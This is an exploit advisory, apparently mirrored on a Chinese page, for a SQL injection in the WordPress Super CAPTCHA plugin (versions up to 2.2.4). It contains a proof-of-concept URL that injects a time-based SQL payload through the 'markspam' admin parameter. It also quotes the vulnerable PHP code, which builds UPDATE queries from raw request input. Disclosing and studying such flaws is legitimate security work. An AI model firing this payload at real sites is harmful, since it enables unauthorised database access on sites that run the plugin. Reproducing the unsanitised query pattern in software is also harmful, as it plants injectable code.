扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
# Exploit Title: WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability # Date: 2011-08-26 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/super-capcha.2.2.4.zip # Version: 2.2.4 (tested) # Notes: user has to be logged in as "admin" and magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-admin/admin.php?page=super-captcha/Logs&markspam=-1' OR SLEEP(5)--%20 --------------- Vulnerable code --------------- if(isset($_REQUEST['markspam'])) { global $wpdb; $UIDs = explode(',', $_REQUEST['markspam']); echo('<h2>Accounts Flagged</h2>'); for($i=0;$i<count($UIDs);$i++) { mysql_query("UPDATE <code>". $wpdb->users ."</code> SET <code>spam</code>='1' WHERE <code>ID</code>='". $UIDs[$i] ."'"); mysql_query("UPDATE <code>". $wpdb->users ."</code> SET <code>user_status</code>='1' WHERE <code>ID</code>='". $UIDs[$i] ."'"); echo('<em>USER ID: '. $UIDs[$i] .' marked as spammer.</em><br />'); } } |
体验盒子
